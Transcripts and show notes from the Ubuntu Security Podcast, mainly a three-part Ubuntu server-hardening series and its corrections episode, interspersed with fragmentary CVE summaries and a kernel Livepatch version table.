is the hardening process of an operating system: we want to always review our work, and fix mistakes whenever possible. Maintain and evolve, even if we do hit a few bumps on the road and make some mistakes along the way. We are human after all, and even if the computer isn’t, all that it does is do what we ask of it, so…yeah! Enough introductions, let’s move on to the meat and potatoes of this episode and right some wrongs! Oh…actually…I don’t think it is really necessary to mention this…but there is always that one person, so: listen to the other episodes if you haven’t yet. I can’t really fix something that you don’t even know is broken.
Ok, point number one that was brought to my attention: remember when we were talking about the swap partition in part 1? Well, it is a valid solution for all the reasons that I mentioned there, but it is not the only one. Drumroll please, as I introduce you all, if you don’t already know it, to the swap file. TADA! The swap file, as the name suggests, is a file in your system that will serve the same purpose as a swap partition. However, instead of being configured as a separate partition of your disk, a swap file is created under the root partition in your system and you simply nudge the OS to remind it that that specific file should be used as swap whenever necessary. Neat, right? Specially because resizing swap files is a lot easier than resizing an entire swap partition. A LOT easier. Using command ‘fallocate’ or command ‘dd ‘will help you get a swap file ready in case you wish to use this method of swapping instead of creating an entire new partition during install, or in case you forgot about it during install. Use the ‘mkswap’ tool to tell Ubuntu that the new file is a swap space and enable the swap file with ‘swapon’. To finish it off, and make changes permanent, add information on the swapfile to ‘fstab’. Remember to correctly set permissions in this swap file, as, even though it is a swap entity, it is still a file. Only the root user should be able to write to that file or read from it, so get your ‘chmod 600’ ready for that. The conclusion here is: both a swap partition and a swap file will serve the same purpose, and they are both located on disk, so not much to compare on that front. However, if you are looking for something more flexible, stretchy, if you will, consider using the swap file. It will help you out with your maintainability needs, and with adjusting to changes in the future, especially if these changes involve increasing the size of the swap, or decreasing it due to hardware changes applied to your device, or any other type of related changes. I do stress though, hopefully enough that you are just being reminded of this here: do this if it suits YOUR needs. Maybe you already have a swap partition, and it is ok to you for it to have an immutable size until the end of eternity, and that is great! You do you. What is important for you to takeaway here is that I am giving you another option, one that might better suit your needs, or not, but I am not the one to decide that for you.
Next up, let’s talk about that ‘hidepid=2’ suggestion I made in part 2, shall we? This suggestion came up when we were talking about fstab, and I was telling you about ways to protect your /proc directory from the prying eyes of possibly malicious users. Well, it unfortunately doesn’t work when you have systemd installed, which is the case for Ubuntu. Whewhe. So yes, blame me for relaying possibly incorrect information to you. I am deeply sorry…but please don’t cancel me for it. There are a few bug threads that mention this error and a lot of proposed solutions given by the community can be found in the various comments. I will not go into too much detail on those here because it might be a bit difficult to get the actual solution through without any visual aid, but I do encourage you to do some research on this, and maybe apply one of the suggested alternatives should it be adequate for your system. Sorry once again for giving you a hardening tip that would cause an error in your system, but hopefully the solutions out there will allow you to get right what I initially got wrong. I’ll try to get some links containing some of these solutions added to the podcast notes in order to help you out, and in order to atone for my mistakes. I’m sorry, I’m sorry once again. Ok, I’ll stop now.
Point number three: I told you to love your logs and embrace your logs during part 2 of this series. The computer pours out its innermost secrets to you and you decide to ignore it? Well…I kind of ignored it a little bit as well, because I talked so much about ‘syslog’ and all of its log files that I forgot about another oh so very important member of the logging squad: ‘journald’. If your Linux system has ‘systemd’, it does have ‘journald’, and therefore, if you are using Ubuntu, you most likely have it too. Since ‘journald’ stores data in binary format, the usual way of accessing the data it collects is not recommended here, as our brains have still not yet evolved to immediately read and process unreadable characters when looking at a sequence of those characters. There are no plain text log files here. Instead, if you want to check out all of the logging goodness that ‘journald’ can provide, and expose all of your device’s secrets, you have to use the ‘journalctl’ utility. I am pretty sure this name is familiar to you, as most times when you have a service issue in Ubuntu or a system issue in general, it recommends you check out the output of ‘journald’ by typing in a shell ‘journalctl -x’. ‘Journald’ is a very interesting logging tool and it can allow you to troubleshoot your system very efficiently. It tracks each log to a specific system boot, for example, and this means that you can check logs considering only data connected to a specific boot instance when using the ‘-b’ option. So, if you have a situation where you know that the issue happened the last time you turned on your computer, instead of checking all of the log, you can narrow it down and try to find your problem in fewer lines of log data instead. You can also filter log data based on a time range, based on a specific service, based on a specific user or based on message priority level. Which one is better to use between ‘syslog’ and ‘journald’, you ask? It depends on your needs. Advantages of using ‘journald’ include the fact that it structures data in such a way that searches can be optimized, plus, it indexes data, meaning that lookup operations of the log files will happen in a much faster manner than they would when searching for information in plain text files. Filtering is also easier with ‘journald’, as seen by all of the options I mentioned previously that you can use together with ‘journalctl’. With ‘syslog’ and all its different plain text log files, it might be a little bit more difficult or troublesome to find exactly what you are looking for, and even correlate log information without having a third party software to maybe assist you with this job. When searching through ‘syslog’ logs we usually end up using ‘grep’, our handy-dandy text file search tool, but unfortunately, ‘grep’ will not take into account the context of a situation. So, when searching through ‘syslog’ logs, instead of a simple one line command you would type if using ‘journalctl’, you create a huge multiline beast with a lot of pipes to get a coherent and valuable result out of the many ‘syslog’ files you wish to have analyzed. Another advantage of ‘journald’ is that ‘journald’ has permissions associated to its log files, so every user is able to see their own log without actually being able to see output that would be exclusive only to root, for example, said users needing to prove their privileged identity before accessing this other sensitive data about the system. Therefore, regular users are able to troubleshoot using ‘journald’ logs, but at the same time, information that should not be exposed to regular users for one reason or another is protected. With ‘syslog’ it will all depend on permissions associated to the log text files, and these will include ALL of the information for one specific log source, so it won’t be every random user that will have the opportunity to possibly use log data to solve their issues, unless you allow said random user to actually read logs in their entirety. Talking a bit about possible disadvantages related to ‘journald’: ‘journald’ does not include a well-defined remote logging implementation and, therefore, is not the best option to consider when you need to build a central logging server, whereas ‘syslog’ allows that to happen very well, since there is even a same name protocol which is used to send messages to a main log server running a ‘syslog’ instance. Plus, ‘journald’ considers only information of Linux systems, while ‘syslog’ encopasses more, such as logs generated by firewall devices and routers. This means that correlation between the logs of the different devices in your infrastructure might be made more efficient when you indeed have a centralized ‘syslog’ server to gather all of that information, especially considering that it is possible to send ‘journald’ data to an already existing ‘syslog’ implementation, as ‘journald’ retains full ‘syslog’ compatibility. One of the issues we find with this though, is that most advantages that come with ‘journald’ are lost when such messages are sent to the centralized ‘syslog’ server, as this server, as the name implies, will include a ‘syslog’ implementation instead of a ‘journald’ one, this ‘syslog’ implementation recovering, storing and processing messages as a regular ‘syslog’ instance would…so, no indexing and no optimized data reading and filtering. The other possible issue is that ‘journald’ needs to send its data to a local ‘syslog’ server, and this server will then send that data to the remote one. Having two tools doing the same logging work might not be the most ideal thing for you or your infrastructure, so do take that into account when setting up your logs and your whole logging system. For this reason and the other reasons mentioned we have that ‘journald’ ends up being more “host-based” than ‘syslog’. Therefore, I once again ask the question: which one is better to use? Maybe it’s ‘journald’ in case you have one host only, maybe it’s ‘syslog’ if you have an entire infrastructure and a centralized log server with third party software that processes all information it gets, or maybe it’s even both, since, as we already discussed in previous episodes, an extra layer of protection is what will help you build up your cyber security walls of defense more efficiently, especially when you consider that you already have ‘journald’ installed by default in your system.
Going on to point number four: when installing tools such as Rootkit Hunter, be aware of possible false positives. It is always useful to have tools that scan your system for you, and point you towards the direction issues might be, however, it is interesting to confirm that the issue database used by such programs is updated and well matched to your system in order for results to be actually useful. So keep two things in mind: that tools such as Rootkit Hunter exist and can be very helpful, and that, even though they can be helpful, they can also not be if they are out-of-date and just end up flooding you with false positives that will then lead you on a wild goose chase that generates nothing of value to you or your system. Also, do be careful about installing programs such as vulnerability scanners that can be later on used by attackers themselves to find flaws in your system. If you’ve used it and no longer need it installed, maybe remove it until it is once again necessary…after all, even security tools increase the attack surface of your system, and they themselves might have vulnerabilities related to them that could be exploited by someone with enough knowledge of it. Finally - and me saying this might sound unnecessary because it should be obvious, but I do say it because there is always that someone out there…right? - don’t think that a scan performed by ONE single scanning tool is enough to guarantee security of a device, especially when we consider tools that do need to rely on previously known hashes, or rules, or sets of steps, in order to identify a possibly malicious entity in a system. That is because attackers are always trying to circumvent these tools by using digital fake mustaches, and, sometimes, these disguises are enough, as is a certain superhero’s glasses. I mean…how can people not know they are the same person? Unfortunately, this major oversight might happen sometimes with your security tools as well, so knowing this is key in order to actually build a truly secure system. By knowing, you also know that said tools should only be a part of a bigger, LAYERED strategy you use to harden your system. Agreed?
Time to dive into point number five. I was asked a question: is ‘ping’ still ‘setuid’ root? And the answer is actually “no”. Oh, well! Remember when we were talking about the dangers of the ‘setuid’ binaries and I used ‘ping’ as an example to show the issues that might arrive when you set that sneaky permission bit to 1? Well, it turns out that my example was a little bit outdated, since ‘setuid ping’ was already put in the WANTED list for “causing too many security issues” and was therefore demoted to non-‘setuid’ status. So, if you are using Ubuntu 20.04 LTS, for example, you can run an ’ls -la /usr/bin/ping’ and you will see permissions set to 755 instead of 4755. How is the privileged socket access performed in this case? Ah…well, that might be a discussion for a future podcast episode, especially since a little bird told me that the solution for that might have caused an even bigger issue than the ‘setuid’ bit when changes to remove it were initially being made. For now, I’ll just leave you to wonder a little bit more about this, and reinforce that, even if ‘ping’ is no longer ‘setuid’, the example stands to show the dangers of having this bit set, be it ‘ping’, be it any other executable in your system that might allow for malicious tampering. Consider the ‘ping’ example a template of what COULD happen should you decide to maybe set its ‘setuid’ bit. Don’t actually do that though, please.
Point number six is as simple as: ’netstat’ has been replaced with ‘ss’. I mentioned using ’netstat’ to check open ports in your system because that is what I have been using since forever. Old habits die hard, I guess…and that, my friends, is definitely something I shouldn’t be saying here, because old habits will also compromise you, since it is always important to keep up-to-date with recent software if you plan on being secure. So yes, forgive me for I have been a hypocrite. Information on ’netstat’ being deprecated is even in the ‘man’ page for netstat. Oof…hurts to see my own mistakes. Read your manuals people, their existence is not trivial. But, you know what? You live and you learn. I know better now, and you do too. So let’s be better together, friends, and use ‘ss’ instead of the obsolete ’netstat’ to find open ports in our system that are open for absolutely no reason! The good thing to come out of this mistake is that we get to once again remember the importance of updating and maintaining systems in order to actually keep them secure, and this also includes the system that is our own minds.
Ok, now that we have tackled the ahem minor errors I made in the last few episodes, and honorably mentioned applications I forgot about, let’s bring up a few other hardening suggestions made by the Ubuntu Security Team so that you can harden your system even more!
Let’s start with the Mozilla TLS configuration generator: this tool which can be accessed through the “https://ssl-config.mozilla.org/” URL can be used to generate configuration files for various server programs, Apache and Nginx included, and it considers three different security levels! Pretty nifty, and gives you the opportunity to maybe learn more about application settings you might not have known all that much about in the first place, and how they can help you when you wish to do hardening for applications you use.
Let’s Encrypt is in this list as suggestion number two, and it is a tool that allows you to get certificates and renew them often enough that you can’t have expired certificates ruin your day. Let’s Encrypt is a CA, or, expanding on the acronym, a Certificate Authority, which is an entity you will need if you plan on using TLS to encrypt your web server’s communications, for example. You can use Let’s Encrypt to create your certificates and then configure the tool to automatically update these certificates whenever they are close to expiring. Phew! No need to worry about unintentionally sending unencrypted data over the wire because of a missed expired certificate! Give those attackers NO windows of opportunity!
AppArmor is installed in Ubuntu by default, and we already talked about it in the last episode, but I am here to ensure that you remember that it does exist, and, even better, you don’t even have to install it in your Ubuntu system to start using it. Take advantage of its existence and don’t forget to profile applications running in your system! Profile ’til you can’t no more and get that metaphorical armor polished and ready to take on everything and everyone, just because you can.
And last but not least, I can’t NOT reinforce this, as I am in the security team and this is what we do for you: always install your updates. Always! It might seem annoying, it might take some of your time, it might even be a little bit angering…but isn’t making changes for the better what life is all about? Update and live to see your server survive another day! Update and sleep peacefully knowing that you are doing the best you can for that server you care about! Update and be ready! Some updates will require the restarting of services, so that those actually start using patched versions of recently changed libraries, and, when we are talking about the kernel, reboots might be necessary, so include restarting and rebooting in your update plans as well, or else the patching done by the security team won’t be effective in your system. If you are having trouble with this…shameless plug: consider using Ubuntu Livepatch in order to get those kernel security-critical updates installed into your system without having to reboot the machine! It’s free for personal use on up to three computers, and it is easy to set up through your Ubuntu system with your Ubuntu One account.
And that is it! An extra episode to patch my previous mistakes, and to deliver to you updates on some previously incomplete information! An episode that mirrors the work done by the Ubuntu Team on its packages, and that hopefully brings you as many benefits as those patches do! Keep your patches up to date, keep your hardening up to date, keep your knowledge up to date, and I am sure you will be ready to face a lot more than you expect! Thank you all for listening to this extra episode of the Ubuntu hardening series on the Ubuntu Security Podcast. Feel free to share your thoughts on this subject and on this series in any of our social media channels! I hope to talk to you all once again in the future, but for now, I bid you farewell and until next time! Bye!
It’s PIE🥧 for everyone this week as Python finally becomes a position independent executable for Ubuntu 22.04, plus Camila brings you the third part in her Ubuntu server hardening guide and we cover security updates for FUSE, Bind, Apache, the Linux kernel and more.
105 unique CVEs addressed
allow_other
mount option - this option specifies all users can access
files from the FUSE fs whereas normally FUSE enforces on the user which
mounted the file has accessCLOSE_WAIT
status for an indefinite period, after connection was closed -
DoSmod_sed
-> crash, RCEmod_lua
- crash -> DoSLimitXMLRequestBody
to > 350MB (is 1MB by default) -> OOB write -> crash,
RCErelease_agent
not properly restricted -> privescKERNEL TYPE | 20.04 | 18.04 | 16.04 | 14.04 |
---|---|---|---|---|
aws | 85.1 | 85.1 | 85.1 | — |
azure | 85.1 | — | 85.1 | — |
azure-4.15 | — | 85.1 | — | — |
gcp | 85.1 | — | — | — |
generic-4.15 | — | 85.1 | 85.1 | — |
generic-4.4 | — | — | 85.1 | 85.1 |
generic-5.4 | 85.2 | 85.2 | — | — |
gke | 85.1 | — | — | — |
gke-4.15 | — | 85.1 | — | — |
gke-5.4 | — | 85.1 | — | — |
gkeop | 85.1 | — | — | — |
gkeop-5.4 | — | 85.1 | — | — |
ibm | 85.1 | — | — | — |
ibm-5.4 | — | 85.1 | — | — |
lowlatency-4.15 | — | 85.1 | 85.1 | — |
lowlatency-4.4 | — | — | 85.1 | 85.1 |
lowlatency-5.4 | 85.2 | 85.2 | — | — |
oem | — | 85.1 | — | — |
Hello listener! Welcome back to our Ubuntu hardening podcast mini-series, where in three episodes, released across several weeks, we have been discussing how to build a network service in an Ubuntu operating system, but not just any Ubuntu operating system, and instead, a HARDENED one. Up until this point, we went from nothing to digital big bang, which was the equivalent of our system install; to years of chemical, geological, and climatic transformations, which were actually a few weeks maybe of setting up basic security measures after our initial install; to, at last, the point where we are ready to finally have our server be born, just as life once did in our beautiful planet Earth. We reach the next stage in our evolution and prepare ourselves to now finally install our server. Don’t be a cheater though, and don’t skip any steps: if you haven’t listened to the other episodes, go do that before you move on here. Earth did not become what it did in a day, so…you can spare a few minutes to listen to the other episodes before continuing with this one. Other listeners might have waited a few weeks, and poor Earth waited billions of years! Lucky you that hardening your Ubuntu system is slightly easier than creating an entire planet, and even an entire universe from scratch. Introductions made, lets jump right in to finally getting our service and all related software up and running in our already hardened machine. And let’s harden it even more, shall we?
I will start this off by just saying: no installing of services that don’t use cryptography. HTTP? Gone! FTP? Next! Telnet? Please no. Don’t even joke about that. Just don’t, or I might actually just start crying unencrypted tears of anger. Encryption technology should be here to stay, and if you are sending sensitive data over the wire, give that data a reason to feel safe and protected during its digital travel. Add that S to the end of the network protocol names. Level up your HTTP and make it HTTPS. Configure your Apache or Nginx server to use TLS. Not SSL. SSL is deprecated. TLS version 1.2 or above. Another important thing to consider when installing the entire stack of applications, libraries and frameworks you might need to run your system: less is more. I actually saw this in a cooking show, and I agree with this statement. I know we sometimes might get amazed at the huge amount of possibilities we have whenever installing software. The human mind has created the most incredible utilities, and we have the power to simply install all of them with one simple command. But just because you have a wide variety of ingredients, it doesn’t mean you have to use them. Some people might like french fries with ice cream. That does not imply you need a french fry library to get your sundae application to be delicious. Sometimes a little chocolate sauce drizzle is all you need. Chef’s kiss! The point here is: install the minimum necessary to run your application. Don’t increase the attack surface. The more you have running in your system, the more possibilities of entry an attacker will have. Keep it short and sweet and avoid getting lost in a sea of files, users and processes that you don’t know how they really work or what they really do. And while we are at it…if you do have the chance, try to install only one or two network services per system/device. Don’t have your server simultaneously be a web server, a mail server, a file server, a database server, and an ice cream server, because why not, right? Don’t, though. This limits the number of services that can be compromised if a compromise ends up happening. It limits the exposure for a single device. Plus, when installing the applications necessary to run these services, remember that a lot of applications like Apache, Nginx, MySQL, PHP…they all have security settings. They know they are the regular targets of attacks, so they provide the user with the tools to perform a secure install or set secure post install configuration values. If it is provided to you, use it! Harden your application as well, after all, it is this application that will most likely be the point of entry into your system. So divide, secure and conquer!
We did it, friends. We have a device providing a service over the network. One would think that after 6 days of work creating a digital ecosystem we would be able to rest on the 7th day, as done by some mighty entities before us, however…people concerned with cyber security don’t sleep. Or stop. Ever! Cyber security is a continuous effort, so post application setup measures must be taken as well if you want your server to keep securely thriving. We have got to ensure the evolution of the species and keep our metaphorical Earth safe and in tiptop shape in order to guarantee the best chances of, not only, survival, but growth and prosperity. Who needs sleep when you can have the joy of knowing that you set up your device for execution success and longevity in the grueling environment that is the Internet! Let’s start then by disabling unnecessary open ports and stopping the execution of unwanted services. You set up your application using the minimum necessary, which is great. Sometimes, however, during install, or even during configuration, applications will open ports and setup services you might not need. Heck, we are talking about this in the post application install and setup phase of our process, however, this could also be done in the post installation of the operating system phase of the process. Checking out which ports are unnecessarily open, and closing these ports will reduce the attack surface area in your system, as an attacker has less points of entry to choose from. A house with one door and one door only provides one single point of entry to an external entity. Of course this external entity could manufacture a new entry point using mechanical tools, but I then digress from the real intention of this analogy, so let’s stick to the basics of the idea here, shall we? An example of an unnecessary open port might be a database port. Sure, you have set up a host based firewall as we have already suggested, and no internet traffic which would have this service as a destination is allowed through, but still…layers!!! When we talk about security we talk about having various and various layers that will protect you in case the previous one has somehow been cracked. So…trust your firewall without trusting it completely. If you don’t need the database port open to the entire Internet, only to localhost, then leave it open just for localhost. If you don’t want to do it for yourself, then do it for me? Please? It makes me a lot less nervous knowing that a multitude of unused open ports are being closed and removed from harm’s way. The Internet can be a brutal place, you know? Use a tool such as ’netstat’, check your open ports and disable Internet access for those that don’t need it through the related application’s configuration file or other available resources. It’ll be quicker than you think, and will provide you with long term peace of mind. Bonus points for the fact that you will know something weird might be happening when you see that some port that should not be accessible through cyberspace is being used to send some data to some shady IP address in a remote country. Syslog mail incoming!
This same idea applies to unwanted services or unwanted daemons. Check out what is set to run automatically or in the background of your system, check your ‘cron’ files, and make sure that these background programs that might be a risk are not just there executing with the sole purpose of being exploited. Only the bare minimum necessary! Let’s not be digital gluttons here, after all, gluttony is one of the seven deadly sins. Deadly for your poor server which will have that background daemon cleaning files in a directory that did exist in the system, but doesn’t anymore, and is now completely useless. Yeah, that server gets exploited by an attacker that was able to leverage an unpatched zero-day in your Internet facing application. No, you might not have been able to defend yourself against the zero-day, but you definitely would’ve been able to avoid a more sophisticated attack against your device had you not let an unnecessary vulnerability prone daemon execute in your system just for the fun of it. The attacker gets in through an issue that is not your fault, but gets to stay and cause more problems because you were too software hungry to delete something that was no longer needed by the system. More software, more vulnerabilities. Another important thing to note here: this is a continuous effort, remember? Yes, we are talking about post application installation and setup security measures that be applied to your system in order for it to be hardened, however, since the application environment will change together with the application, it is necessary to maintain the system and reanalyze all that has been setup in order to update the hardening in case it is necessary. Your hardening needs to evolve together with your software and your application.
We haven’t yet talked about or dove deep into the elephant in the room subject that is system files. We surrounded the subject, got close to it here and there, but we still have not faced it head on, so let’s go for it now. Files contain the data which we analyze, which we process, which we use to perform our computing, since even execution of a program begins with the file containing the code that is to be executed. In Linux, and consequently in Ubuntu, everything is a file. This essentially means files will contain everything an attacker needs to compromise a system. They might want to just read a file and steal its data, they might want to edit a text configuration file and change the behavior of an application, or they might want to create a file from scratch which will be a program that, when run, will do malicious things in the system. The possibilities with files are endless, and that is why file permissions must be treated with the utmost care. We must protect the bricks that make up our operating system. You have your server running. You have everything you need on the system and you won’t be performing any further install or making any further changes critical to the service any time in the near future. So why not spend some time checking your application files and your system files to make sure they do not have any suspicious or possibly harmful permissions? What files in the system contain sensitive data that shouldn’t be accessed by every user? Which files can be read by all, but should have their editing permissions restricted only to the system administrator? Which executables are allowed to be executed by a specific group of users but not by any other user in the system due to dangerous commands being a part of the compiled code? This analysis must be made and sometimes default permissions must be questioned, since the idea is that you tailor your environment to your needs. Use ‘chmod’ and ‘chown’ to get your permissions right and protect your files.
An additional point of concern: ‘suid’ and ‘sgid’ binaries that might be available in the system. It is interesting to disable files for which this permission is unwanted, possibly because it can easily be exploited by an attacker for privilege escalation or even worse. For those unaware, a ‘setuid’ or ‘setgid’ binary will allow a user to execute the program that is this binary considering privileges that are not necessarily the ones set for this user. The execution will happen with the privileges of the file owner or the file group instead. Think about the ‘ping’ program, for example. Our old friend, ‘ping’. ‘Ping’ is a ‘setuid’ binary owned by ‘root’. Whenever a user executes the ‘ping’ program, they run it with ‘root’ privileges, and this is generally necessary, since ‘ping’ requires the opening of a socket and this is not an operation that can be initiated by any random user in the system. However, since ‘ping’, IN THEORY, is pretty harmless, letting a user acquire the temporary privilege to open the socket and get ‘ping’ to run is a solution. Let’s consider, however, a situation where the ‘ping’ file’s permissions are changed to allow any user to edit it, so, writing to the file is available to everyone who wishes to do it. Makes me nervous just thinking about it…A user with little privileges in the system is then able to edit the file and change its contents to that of a program that runs ‘ping’, but at the end also opens a new shell. When this new ‘ping’ is executed with ‘root’ privileges, the new shell that is opened can be opened with ‘root’ privileges as well. See the problem here? Of course this is an example, and default permissions for the ‘ping’ executable do not allow any user to write to the file, the only user allowed to do that being ‘root’. The point here is to show the dangers of the ‘setuid’ and ‘setgid’ binaries and encourage you to look at your system and disable these permission bits for files where this is not necessary, where setting them is not needed. Maybe you don’t need your users to run ‘ping’ at all, so why not let just those with ‘sudo’ privileges involving network access be allowed to actually run it? Disable the ‘setuid’ bit and limit usage of ‘ping’ to those who really need it. The same goes to any other ‘setuid’ binary any fresh software install might have created. Or even files you have created and set permissions to yourself. ‘Setuid’ and ‘setgid’ binaries are very commonly leveraged by attackers to exploit a system, so having less of them is a good measure to apply in order to reduce your attack surface. Also…let’s continue doing continuous work here, and always check permissions and ‘suid’ or ‘sgid’ for new files that are welcomed into our system, or old ones that are updated.
What’s next then? We seem to have covered all of our bases, securing every part of our system. Go us! However, some say that teamwork is the best kind of work, so let’s increase our hardening by going beyond our lonely manual configurations and implementations and use some security software to help us. You are not alone in the digital world. You are not the only one trying to make your device more secure and trying to protect it against Internet predators. A lot of people have developed a lot of software to help us strengthen our defenses and better manage security in our devices. So here are a few to consider: ‘fail2ban’, which is an intrusion detection and prevention system that will analyze your log files and block suspicious activity through your firewall should any suspicious activity be detected. Other open source software out there like Snort and Suricata can also be used to achieve similar things to this; also consider installing malware detecting software with ClamAV or exploit detecting software with RootkitHunter; 2FA is highly recommended nowadays to anyone that wishes to use authentication in a secure manner, so why not implement it directly in your Ubuntu OS? Through Google’s PAM package, for example, it is possible to set 2FA for users logging into your machine, using ‘sudo’, doing everything in the system that requires a password! NO, don’t even think about considering the use of a less strong password because of this, but do see it as another layer added to the various others we have been building up here to keep your system secure; another authentication alternative is considering the usage of a centralized authentication system, where your users are not authenticated locally, but instead in a remote server dedicated to this type of service. Of course, do not forget that usually, a service providing device, such as your own server, will have local application-only users that do not need to be authenticated with this other centralized authentication unit in order to run their activities in the device, so do configure those properly. However, for users that are a part of your organization layout, it might be interesting to consider outsourcing your authentication needs to this extra server. Keep in mind, however, that this increases the attack surface for your infrastructure in general, since you add to it an entirely new service device, and apply it only if the pay-off is worth it to you and you entire structure; and last but not least, do consider using software that enforces Mandatory Access Control, such as SELinux, and of course, the one and only AppArmor.
Mandatory Access Control, or MAC, for short, is the counterpart to DAC, or Discretionary Access Control. In DAC we have that access control is performed in such a way that access is allowed to resources based on the identity of a user and what the resource owners allow or not for that user in that resource. Here, all the OS can do is enforce permissions based on identity limits set by this resource owner. On the other hand, MAC is the type of access control where a policy administrator, which is usually the ‘root’ user, but can be another administrative user, is the one to establish access permissions to a resource, no matter the owner of that resource. The policy administrator is able to make such choices not only based on the resource but also based on the entity which will access it as well, this entity possibly being a user, or even a program, and resources being files, network devices and other programs. The operating system can then enforce access beyond the one set by the resource owner and considering more than just the identity of the entity that wishes to access the resource. In DAC, permissions for a specific resource can be easily changed by the user that owns it. The Linux file system permissions are an example of DAC. Changes to these permissions, as simple as they may be, can result in programs or users being able to interact with resources they normally shouldn’t, and the ever untrustworthy user is the only one standing in the way of that. On the other hand, in MAC, with permissions or sets of permissions being defined by a policy administrator only, a random user can no longer change the ones associated with a resource just because they own it. Well, they can, through DAC, but changing overall resource permissions will no longer be as easy as just running ‘chmod’. That is because, as an additional layer to the checks performed to the DAC set, MAC will give more granularity to the access control process, and, based on the rules set by the policy administrator, define in an owner independent manner, what users or programs can access in the system based on who they are, and based on what permissions they have assigned to them regarding each specific resource. And if some shady entity wants to maybe bypass that, they will have to go through the dead body of the kernel of the operating system, which is a much harder beast to face. Even though DAC might be a more flexible way to set resource permissions, MAC is usually considered the more secure alternative and it can even be used as a complimentary measure on top of DAC to add more security to your system. You can do this, for example, by activating the AppArmor kernel security model in your Ubuntu OS, and it will allow you to restrict actions that running processes can take and resources they can access. AppArmor, therefore, will bind programs, and confine them, reducing the range of harmful operations a program might be able to execute in your system. Each program will have a profile associated with it, and these will contain access rules which, when broken, can have the related attempt simply reported, or instead blocked. An example would be disallowing access to a certain directory for the process that is your web server. The web server should only access web server related directories and files and AppArmor can be set up to guarantee that. Joining DAC and MAC in your system will allow you to build up your security layers very efficiently, so do consider learning more about software that allows this to happen, as it will bring you closer to the hardened utopia we all look forward to achieving.
We did it. We created an inhabitable and secure ecosystem. Just like Earth after the many, many, MANY years that came after the big bang. Thankfully it didn’t take us that long, although it wasn’t a walk in the park getting all that hardening done. Our job, however, is never complete, as cyber security is a continuous effort. Have I already mentioned this? I can’t remember. Anyway, the idea is to keep hardening even after all is set and done to run your service. How can this be achieved?
Well, for starters, keep your Ubuntu system updated and install patched package versions when possible. Yes, sometimes updating breaks the system, but between spending time to maybe adjust to changes, and spending a lot of nights awake having to choo away an attacker instead, which one would you rather do? Another thing that needs to be done, always, is maintenance of users, groups and files in the system. I already mentioned this, but I am bringing it up again because it is very important. Your server is now a living entity, working to provide data and utilities to users all across the Internet. Seasons will change, updates will happen, files will transform, users will come and go, but you will stay. You will stay and update user and file permissions according to what is applicable to your ever changing system for that point in time. Don’t assume that your initial configuration of users and files will apply forever. What is forever though is your effort to monitor and manage this system you have brought to life. Pretty words to live by, and what we should actually be doing with our planet, you know…taking care of it…but I once again digress. And just as a last tip…to end this suggestion list in a very random and abrupt manner: shred your files, don’t just remove them from a system. Deleting a file simply removes the reference to it in a filesystem, meaning someone can still dig it up from the disk should they be determined enough to do it. Get rid of sensitive data the correct way and overwrite in disk that which will no longer be used in your server.
We finally reach the end my friends, and the key takeaway here is: every system is unique, and every service will have its own infrastructure and needs. Do not apply all of the changes suggested here if they don’t bring any benefits to you. Mom used to tell you to eat your vegetables, but if you are allergic to one of them, I am sure she wouldn’t encourage you to do it, especially if you don’t like eating it! What I mean here is: all we have here are suggestions, some which might be amazing and super useful to you, some that won’t work. Know your system and you will definitely know what will work best for you. This might even be my actual last tip, if I haven’t made this clear enough with all I have said previously: know your IT infrastructure well, and you will better know how to manage it and how to defend it. Hardening might prevent a lot from happening, keeping you safe from various intended attacks, however, creativity has always been the evolution of man, and creative hackers are plenty out there, so it might be that your hardening sometimes might fail you. If you know your system well, though, you might just be the last layer of hardening the system needs to kick out that hacker that was able to worm their way into the network. Keep your planet orbiting around the sun, keep your ecosystem alive and well, and do it by knowing how it works and by taking care of it when what used to work might not anymore.
That is all for today’s listeners! I hope you enjoyed all of the hardening suggestions we had for you in this and in the two previous episodes, and I hope you get to use them in your own systems to make them more secure! As always, do feel free to share your thoughts in our social media channels, and for now, I bid you all farewell and until next time! Bye!
This week we bring you part 2 of Camila’s guide on Ubuntu server hardening, plus we cover vulnerabilities and updates in Expat, Firefox, OpenSSL, LibreOffice and more.
22 unique CVEs addressed
xmlGetID()
returns a pointer to just-freed memory - so if application has not done
other memory modification etc then likely is fine - although is UB and
other applications may not be so mundane so still worth patching--no-privileged
option) by loading a crafted module that then calls
setuid()-F
argument could
cause a possible crash / RCEHello listener! I have returned with the second part of our Ubuntu hardening podcast episode. You asked for it, and you’ve been waiting for more, and I am here to oblige. We were last seen concluding our Ubuntu install, bringing into fruition our digital big bang, which would then allow us to start setting up our galaxy, preparing our Earth-server environment to receive life in the form of code. Today, we dive into the hardening measures we can apply to our Ubuntu system right after a fresh install, but right before a server application setup. However, stop here and go listen to the last episode if you haven’t yet, or else you might be a little bit lost among the metaphorical stars. I’ll pause here so you can pause as well and go check that out. Back already? I will trust you, and believe that you now know how to harden your Ubuntu system during install, so let’s get moving and talk about what’s next!
Usually when you install an operating system you define the super user’s password during install…a ahem strong password. Right? Why am I talking about this in the post install section then? Because Ubuntu does not encourage usage of the ‘root’ user. If you remember correctly, or if you don’t, but you decide to do an install right now, you will remember/notice that during install you create a new user for the Ubuntu system that is not ‘root’. As previously defined, this user will have a strong password - RIGHT? - and by default, this user will also have full ‘sudo’ capabilities, and the idea is to use this user account instead of the root account to perform all necessary operations in the system. ‘Root’ will exist in the system but it has no password set, meaning that ‘root’ login is also disabled by default. This is actually a good thing, considering that you shouldn’t be using the ‘root’ user to perform basic activities in your system. ‘Root’ is just too powerful and your Ubuntu system knows that. That is why it creates a new user that has as much and enough power in the system, but that can be controlled through the appropriate configuration of ‘sudo’. To run a privileged command through use of ‘sudo’, a user will need to know the ‘sudo’ user’s password, so that is an extra layer of protection added to privileged commands in the system, as well as an extra layer of protection that prevents you from destroying everything after you decide to drink and type. Additionally, ‘sudo’ calls result in the inclusion of information regarding such a call into a log file, which can be used for auditing and for threat analysis in your system through usage of other installed tools. ‘Sudo’, if configured correctly, will allow you to have more control over a user’s privileges in your system. By editing the /etc/sudoers file , you can define which groups in the system have which ‘sudo’ privileges, meaning, which users are allowed to run specific commands with the privileges of another user, which is usually ‘root’. As a result, you don’t have to worry about coming across a situation where someone logs in directly as ‘root’ and starts wreaking havoc in your system. You have created the appropriate users and groups, and have attributed the appropriate privileges to each when editing the ‘sudoers’ file. All users have strong passwords, and whenever they need to execute privileged commands, they have to enter this password, which makes it harder for an attacker that happens to get a shell to type away in their keyboards and, with no obstacles to hinder them, read the /etc/shadow file, for example. Granted, if attackers have a password for a user that has all ‘sudo’ privileges set, this is the equivalent of being ‘root’ on 